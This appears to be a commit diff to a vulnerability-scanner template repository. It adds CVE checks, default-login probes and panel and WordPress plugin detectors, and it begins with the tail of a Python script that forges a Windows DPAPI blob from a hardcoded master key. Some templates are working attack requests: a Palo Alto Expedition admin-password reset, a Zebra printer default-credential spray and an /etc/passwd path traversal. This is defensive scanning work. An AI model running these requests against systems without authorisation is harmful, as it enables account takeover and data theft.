if alg_hash == self.CALG_SHA_512:
if entropy is not None:
return self.hmac_sha512(key_bytes, self.combine_bytes(salt_bytes, entropy))
else:
return self.hmac_sha512(key_bytes, salt_bytes)
elif alg_hash == self.CALG_SHA1:
ipad = bytearray([0x36] * 64)
opad = bytearray([0x5C] * 64)
for i in range(len(key_bytes)):
ipad[i] ^= key_bytes[i]
opad[i] ^= key_bytes[i]
buffer_i = self.combine_bytes(ipad, salt_bytes)
sha1 = SHA1.new()
sha1.update(buffer_i)
sha1_buffer_i = sha1.digest()
buffer_o = self.combine_bytes(opad, sha1_buffer_i)
if entropy is not None:
buffer_o = self.combine_bytes(buffer_o, entropy)
sha1.update(buffer_o)
sha1_buffer_o = sha1.digest()
return self.derive_key_raw(sha1_buffer_o, alg_hash)
else:
raise Exception("Unsupported Hash Algorithm")
def encrypt(self, plaintext, key, algCrypt):
if algCrypt == self.CALG_3DES:
iv = b'\x00' * 8
cipher = DES3.new(key, DES3.MODE_CBC, iv)
elif algCrypt == self.CALG_AES_256:
iv = b'\x00' * 16
cipher = AES.new(key, AES.MODE_CBC, iv)
else:
raise Exception(f"Unsupported encryption algorithm: {algCrypt}")
padded_data = pad(plaintext, cipher.block_size)
return cipher.encrypt(padded_data)
def create_blob(self, plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags=0, entropy=None, description=""):
descBytes = description.encode('utf-16le') if description else b'\x00\x00'
saltBytes = os.urandom(32)
hmac2KeyLen = 32
if algCrypt == self.CALG_3DES:
algCryptLen = 192
elif algCrypt == self.CALG_AES_256:
algCryptLen = 256
else:
raise Exception(f"Unsupported encryption algorithm: {algCrypt}")
if algHash == self.CALG_SHA1:
signLen = 20
elif algHash == self.CALG_SHA_256:
signLen = 32
elif algHash == self.CALG_SHA_512:
signLen = 64
else:
raise Exception(f"Unsupported hash algorithm: {algHash}")
# Derive key
derivedKeyBytes = self.derive_key(masterKey, saltBytes, algHash, entropy)
finalKeyBytes = derivedKeyBytes[:algCryptLen // 8]
# Encrypt data
encData = self.encrypt(plaintext, finalKeyBytes, algCrypt)
# Construct the BLOB using BytesIO
blob = BytesIO()
# Version
blob.write((1).to_bytes(4, 'little'))
# Provider GUID
providerGuid = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le
blob.write(providerGuid)
# MasterKey version
blob.write((1).to_bytes(4, 'little'))
# MasterKey GUID
blob.write(masterKeyGuid.bytes_le)
# Flags
blob.write((flags).to_bytes(4, 'little'))
# Description length
blob.write(len(descBytes).to_bytes(4, 'little'))
# Description
blob.write(descBytes)
# Algorithm ID
blob.write(algCrypt.to_bytes(4, 'little'))
# Algorithm key length
blob.write(algCryptLen.to_bytes(4, 'little'))
# Salt length
blob.write(len(saltBytes).to_bytes(4, 'little'))
# Salt
blob.write(saltBytes)
# HMAC key length (always 0)
blob.write((0).to_bytes(4, 'little'))
# Hash algorithm ID
blob.write(algHash.to_bytes(4, 'little'))
# Hash length
blob.write((len(derivedKeyBytes) * 8).to_bytes(4, 'little'))
# HMAC2 key length
blob.write(hmac2KeyLen.to_bytes(4, 'little'))
# HMAC2 key
hmac2Key = os.urandom(hmac2KeyLen)
blob.write(hmac2Key)
# Data length
blob.write(len(encData).to_bytes(4, 'little'))
# Encrypted Data
blob.write(encData)
# Create the HMAC (sign) over the entire blob except for the sign field
signBlob = blob.getvalue()[20:] # Skip the first 20 bytes for the HMAC calculation
sign = self.derive_key2(masterKey, hmac2Key, algHash, signBlob, entropy)
# Sign length
blob.write(signLen.to_bytes(4, 'little'))
# Sign
blob.write(sign)
return blob.getvalue()
def main():
args = {
'master_key': '48F4153A8C26C2B026562685B67C30EFF119D735',
'master_key_guid': '98dc3c79-9aa5-4efc-927f-ccec24eaa14e',
'local': 1,
'base64': 1
}
current_time = datetime.utcnow().strftime("%Y%m%dT%H%M%SZ")
future_time = (datetime.utcnow() + timedelta(days=1)).strftime("%Y%m%dT%H%M%SZ")
plaintext= f"local,admin,Primary,Password,{current_time},{future_time}"
plaintext=plaintext.encode('utf-8')
if not all(c in string.hexdigits for c in args['master_key']):
print (f' Provided master key is not valid: {args.master_key}')
return
try:
uuid.UUID(args["master_key_guid"])
except ValueError:
print (f' Provided master key GUID is not valid: {args["master_key_guid"]}')
return
# Parse the master key and GUID
masterKey = bytes.fromhex(args['master_key'])
masterKeyGuid = uuid.UUID(args["master_key_guid"])
algCrypt = DPAPIBlob.CALG_AES_256
algHash = DPAPIBlob.CALG_SHA_512
flags = 0
if args['local']:
flags |= 4 # CRYPTPROTECT_LOCAL_MACHINE
dpapi = DPAPIBlob()
encrypted_blob = dpapi.create_blob(plaintext, masterKey, algCrypt, algHash, masterKeyGuid, flags)
if args['base64']:
output_data = base64.b64encode(encrypted_blob).decode('utf-8')
else:
output_data = encrypted_blob.hex(' ')
print(f"{output_data}")
if __name__ == "__main__":
main()
http:
- method: GET
path:
- "{{BaseURL}}/RSTS/UserLogin/LoginController?response_type=token&redirect_uri=https%3A%2F%2Flocalhost&loginRequestStep=6&csrfTokenTextbox=aaa"
headers:
Cookie: "CsrfToken=aaa; stsIdentity0={{code_response}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "access_token="
- "RelyingPartyUrl"
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100c1e04d6c3c9b3781cddc3a25c1575a5ba79913fcb113b949659cbe6f87802da4022100ffc7b910822ab03f153975956bc9be2f175452f64a182962f4c3f93e1b7f68c8:922c64590222798bb761d5b6d8e72950

31
http/cves/2024/CVE-2024-46310.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2024-46310
info:
name: FXServer < v9601 - Information Exposure
author: s4e-io
severity: medium
description: |
Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.
reference:
- https://github.com/UwUtisum/CVE-2024-46310
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-46310
- https://vulners.com/githubexploit/D31ED8EC-1E21-54F9-AD42-778DAFBC8B4E
metadata:
verified: true
max-request: 1
vendor: fxserver
product: fxserver
tags: cve,cve2024,fxserver,info-leak
http:
- raw:
- |
GET /players.json HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"endpoint", "id", "identifiers", "name", "ping")'
- 'status_code == 200'
condition: and

43
http/cves/2024/CVE-2024-5910.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2024-5910
info:
name: Palo Alto Expedition - Admin Account Takeover
author: johnk3r
severity: critical
description: |
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
reference:
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
- https://security.paloaltonetworks.com/CVE-2024-5910
- https://nvd.nist.gov/vuln/detail/CVE-2024-5910
classification:
cve-id: CVE-2024-5910
cvss-score: 9.3
cwe-id: CWE-306
epss-score: 0.00043
epss-percentile: 0.10397
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: cve,cve2024,palo-alto,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"
matchers-condition: and
matchers:
- type: word
words:
- "Admin user found"
- "Admin password restored"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100ae2af8d3f22acde5d02c660aec9cef1d74a0d99f0b3e920c76a31a3efadbf86a022100f1a5128a2ec167051d28fa1c8b018e8ce88fde39ec5efdaeaa4baf88b5422e87:922c64590222798bb761d5b6d8e72950

42
http/default-logins/zebra/zebra-printer-default-login.yaml Normal file
View File

@ -0,0 +1,42 @@
id: zebra-default-login
info:
name: Zebra - Default Login
author: y0no
severity: high
description: |
Zebra default login credentials was discovered.
metadata:
verified: true
max-request: 4
shodan-query: title:"Zebra"
tags: zebra,default-login,misconfig,printer
http:
- raw:
- |
POST /authorize HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
0={{username}}&1={{password}}
attack: pitchfork
payloads:
username:
- 1234
- admin
password:
- ''
- 1234
matchers-condition: and
matchers:
- type: word
part: body
words:
- ">Access Granted. This IP Address now"
- type: status
status:
- 200

27
http/exposed-panels/freescout-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: freescout-panel
info:
name: FreeScout Panel - Detect
author: s4e-io
severity: info
description: |
FreeScout panel was discovered.
reference:
- https://github.com/freescout-help-desk/freescout
metadata:
verified: true
max-request: 1
fofa-query: app="FreeScout"
tags: panel,login,freescout,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: dsl
dsl:
- 'contains(body, "<title>FreeScout</title>")'
- 'status_code == 200'
condition: and

35
http/exposed-panels/paloalto-expedition-panel.yaml Normal file
View File

@ -0,0 +1,35 @@
id: paloalto-expedition-panel
info:
name: Palo Alto Expedition Project Login - Detect
author: johnk3r
severity: info
description: |
Palo Alto Expedition Project login panel was detected.
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: panel,expedition,palo-alto,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Expedition Project</title>"
- type: status
status:
- 200
# digest: 490a004630440220464a85e29e781c5ebe163238c1bf92060d051c3c5c0260befac61260f4b12c0f022060ffaa59b2b7309e20ea17adb3b34c85e8696fbe99f569042a1f2b2949671916:922c64590222798bb761d5b6d8e72950

27
http/exposed-panels/sqlpad-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: sqlpad-panel
info:
name: SQLPad Panel - Detect
author: s4e-io
severity: info
description: |
SQLPad panel was discovered.
reference:
- https://github.com/sqlpad/sqlpad
metadata:
verified: true
max-request: 1
fofa-query: "SQLPad"
tags: panel,login,sqlpad,detect
http:
- method: GET
path:
- "{{BaseURL}}/signin"
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>SQLPad</title>", "webpackJsonpsqlpad")'
- 'status_code == 200'
condition: and

28
http/exposed-panels/traccar-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: traccar-panel
info:
name: Traccar Panel - Detect
author: s4e-io
severity: info
description: |
Traccar panel was discovered.
metadata:
verified: true
max-request: 1
fofa-query: app="Traccar"
shodan-query: html:"Traccar"
tags: panel,login,traccar,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>Traccar</title>", "Traccar GPS Tracking System")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502201869453a9072a735a4cde34edbdaedf6b7893d1988a8f7b37ec365eaf47429d9022100dd5206a52ada302c99f97ebabf63077ce04a3478fc2440f11470977f266c87e6:922c64590222798bb761d5b6d8e72950

26
http/exposed-panels/txadmin-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: txadmin-panel
info:
name: txAdmin Panel - Detect
author: s4e-io
severity: info
description: |
txAdmin panel was discovered.
metadata:
verified: true
max-request: 1
fofa-query: title="txAdmin Login"
tags: panel,login,txadmin,detect
http:
- method: GET
path:
- "{{BaseURL}}/auth"
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>txAdmin Login</title>", "txAdmin Logo")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100f1e5817a43f9426c2dc2e0449b561158fb47d32bb1af34cbe1aa2d7568e58e80022100ab6e7f2d7c284cadddd9dc88640cc64757bcebd2568ae27f8fcbe447c1153667:922c64590222798bb761d5b6d8e72950

25
http/exposed-panels/usermin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: usermin-panel
info:
name: Usermin Panel - Detect
author: s4e-io
severity: info
description: |
Usermin panel was discovered.
metadata:
verified: true
max-request: 1
fofa-query: "Login to Usermin"
tags: panel,login,usermin,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<title>Login to Usermin</title>", "/manifest-usermin.json")'
- 'status_code == 200'
condition: and

32
http/exposed-panels/veritas-netbackup-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: veritas-netbackup-panel
info:
name: Veritas NetBackup OpsCenter Analytics Login - Detect
author: rxerium
severity: info
description: |
A Veritas NetBackup OpsCenter Analytics page was detected.
reference:
- https://www.veritas.com/
metadata:
verified: true
max-request: 1
shodan-query: html:"Veritas NetBackup OpsCenter Analytics"
tags: panel,veritas,netbackup,opscenter,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/opscenter/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Veritas NetBackup OpsCenter Analytics'
- type: status
status:
- 200
# digest: 4a0a00473045022100aae7c24c1b275e2b7f5090b2f5edd0730740a14f3394b0df694d6e8278c1830002207b203080262845c5af9bd9067d76fe44f4cc8b2abfbe27d84bc4c25805cf9c96:922c64590222798bb761d5b6d8e72950

30
http/exposed-panels/vmware-aria-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: vmware-aria-panel
info:
name: VMware Aria Operations Login - Detect
author: rxerium
severity: info
description: |
Detects VMware Aria Operations Panel.
metadata:
verified: true
max-request: 1
shodan-query: title:"VMware Aria Operations"
tags: panel,aria,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/ui/login.action"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>VMware Aria Operations</title>"
- type: status
status:
- 200
# digest: 4b0a00483046022100e968abbe5d43bf338a4dddf66c240b564e27097fd7d2d56d0ab8612e79ff6349022100f106a47b7722e502490502de78653961e81b7c147d25aa2ecc980be3c122fa4e:922c64590222798bb761d5b6d8e72950

38
http/misconfiguration/root-path-disclosure.yaml Normal file
View File

@ -0,0 +1,38 @@
id: root-path-disclosure
info:
name: ROOT - Path Disclosure
author: soltanali0,ArganexEmad
severity: high
description: |
Detects potential exposure of sensitive file paths like /000~ROOT~000/.
metadata:
verified: true
max-request: 4
tags: misconfig,exposure,info-leak,listing,lfr
http:
- method: GET
path:
- "{{BaseURL}}/home/000~ROOT~000/etc/passwd"
- "{{BaseURL}}/000~ROOT~000/etc/passwd"
- "{{BaseURL}}/OLDS/home/000~ROOT~000/etc/passwd"
- "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "^root:.*:0:0:"
- type: regex
part: accept_ranges
regex:
- "bytes"
- type: status
status:
- 200
# digest: 4b0a004830460221009b4e9101d1f7d2ca2655255b58fa8200358289497f1a6093cb49884816de63b6022100f2a74c6c7829b157266e4cd4ddd96d1cffdc08ab963db579b0d18b3697d16919:922c64590222798bb761d5b6d8e72950

32
http/technologies/accellion-detect.yaml Normal file
View File

@ -0,0 +1,32 @@
id: accellion-detect
info:
name: Accellion - Detect
author: rxerium
severity: info
description: |
Dectection of Accellion File Transfer Appliance.
metadata:
verified: true
max-request: 1
shodan-query: html:"/cfadmin/img/"
tags: accellion,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}/cfadmin/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '/cfadmin/img/accellion-logo.png'
- 'secured by accellion'
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022064cf473925e3ee1aef47e835cf3a11b9aa04038eadab6b88fdb7d9a83d3b1ee502210084c56386fa1cc923ff3feab4e2f379b9520392dd804ceb5ef54229e3434184a9:922c64590222798bb761d5b6d8e72950

31
http/technologies/mirth-connect-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: mirth-connect-detect
info:
name: Mirth Connect Admin Panel - Detect
author: rxerium
severity: info
description: |
Detects Mirth Connect Administrator panel.
metadata:
verified: true
max-request: 1
product: mirth_connect
shodan-query: title:"mirth connect administrator"
tags: mirth-connect,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Mirth Connect Administrator</title>"
- type: status
status:
- 200
# digest: 4a0a0047304502210099e94c111d678426d1d40e357d0601cfea0fbf2644565fa3cec4966f8e801da502201f3d50e3f4dc9676facf80d667af438be9ce3143a60aadf13a97f0c4f4d515b5:922c64590222798bb761d5b6d8e72950

30
http/technologies/oracle-fusion-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: oracle-fusion-detect
info:
name: Oracle Fusion Middleware - Detect
author: rxerium
severity: info
description: |
Oracle Fusion Middleware was detected.
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Welcome to Oracle Fusion Middleware"
tags: oracle,middleware,detect,tech
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Welcome to Oracle Fusion Middleware"
- type: status
status:
- 200
# digest: 4b0a00483046022100be299dbe97747cc46358f3ece4b2f036d0bf74167ec7d44212289a295d199752022100d8bdde86185348b83eeba82f820e4c3c1aec6a1da64e77fb436b0aff14b1772c:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/ad-inserter.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207eb2a3f4138ed93b2851c64534eb585150fa30d2dd8ea68a6c78d28548a16335022100f340aa18cb5693abce6dc92893c6bc68894d84c1dc7c53bde207519d7d2fb71a:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/add-to-any.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205fe4363eee98da4af10125b571daf8f5ff25817b704b66a2e4f903dbae0e5ea30220644cda50be86e1c4b27c1872d48ce1505c2de6f284126dd405ec43f3baba0d84:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/admin-menu-editor.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203e6f7f749447ee24de1ffc1633821139092fbf3cefa3b290f8d5235ddaf9ca90022036abeed0c509b56e662bc942822e273a636e77d1eb6db603a04baf48406c971d:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/advanced-custom-fields.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100845aeb1492e46c3a6efe8518b808ac9c30bdd19e61c219a061b2c028963250c70221009f702c1fd9c068fb1a0588fd0915296b5ce79ad2f78c25c775d006df94774c72:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/akismet.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f5d837294ecd22ebb74d8b09ae5bbf212f24b1fa6e7b7e7dcad0db89044a9a04022100bacdcb41f854ad0eebd8ce1305e504ffedaceb95ce2ee689d1f693e04a6bbf28:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022025c6c0208a0e99957c1846cc8403ca4ab464438c510ac6b16009a5e7e12bce9e022007df79a28750810db17c3a97f9234505d9013655174a8c17066111d3a041273f:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220501abeecb08946208fba6a228afe11fba60a955f6367e83a5e28112b1e9d0048022000863ea752b876e6adf4dbe500644861fbeb0793cd7757c757b0d36418c22d94:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402201b82e6c4c223648506dd81495077c77c7e6ba06e035f6515cccec7d0732a180102205f91e01cac2d07e2ace92f6106eda60d76c5ce336c29b5fbaeaa412ba9a8f818:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/amp.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206617a5c7578f33476732808398205c98fe6ce72cc18c2bf084c85bdf6b7d969902200554ff997a9352d74c72d473740fd96f59d14677533762ce43f9230c09516085:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/antispam-bee.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100a15fb994ea26af9051e35a92b2daf47aa383cc8d9d506c14f341be2af308635f0221009a1f31f2a3ad8f44c6801be46a2a2bd353d599b8e5e3f12852a0c34d2e8444fa:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/astra-sites.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221009bf4ffb7c7738c91a820764109cff1231b2abb38495c5fb0829609b16ab46a7902203e143a2354d9d2fd616d419cb1ed3a047b2d1dc11c89d1740e8003934ca58d22:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/autoptimize.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220592dc6bf9e9838351c914f1cd9f0e0e92a2eea6b9656c4b78aa1b003166cc34202205fbec1fd6327568f36faec12986618ca3a807d77c90fa9cae03151548c17eb04:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/backwpup.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220536eefa216266d99fb5eeb8a57663995a8ee91e115839900993db07bf987c814022016efda6657ae0094c19cbf237f8d59c86238537b1cbca708655c86e27c380b1d:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/better-search-replace.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f17343b40c6e9321ba6a51f238ccf3d242babbf47f3537a57fa40aabaec43993022100e8f60018176ba62a5f5e3cc421344746666953595dff5cd0ff5e57bea315211c:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/better-wp-security.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022048e4d269f3f360f72a7606ace41ad2956020f32a7bc6f6ebdffc2d5c6076142802210089766b9385f3da89ed21e8440df04d02aef0f207a17dc8986f6972b91b9d9289:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c3e369e62871ce407cc435334f273f969a462f49419ac18b61575d02c7c147d10220126a688c4c7134940808087ab8c736cc2b7c15d8b78606b4a7d3eec511e1a67e:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203ff2f94869e2d71404d7b6b21173f0101cdcacc7111ef071174839007389d4cb022051eb3bb546b1338c00e01fc72121a651f5290bf448f7186cf0d34459638dbb21:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/breeze.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008df933da120aa14f7f2997875c3f8311fa1d1cdb2f36d3cbff459d4bc70be6420221009b95191740be22b88a0af6fcec549ff73229b8229241248cd6a683af3bf3c00b:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/broken-link-checker.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022078de628675b3d1b0b81ddde48637dcb73b3e0ffa3ad495709e0236a6f377b3dc022100f0e3fa6027cefd8aa0d6467f0ba7f09a9be53ea954e80af9360d7aa5d321f9bf:922c64590222798bb761d5b6d8e72950

2
http/technologies/wordpress/plugins/chaty.yaml
View File

@ -46,3 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d87c6f91e98a45badffe40c2c1155d0995ce10f05f32b11cd006f5c16188fe9b022100ade3383e727230301672bcc8c1ed3b6fe152e55694a472f1b90d2b099fbae87b:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More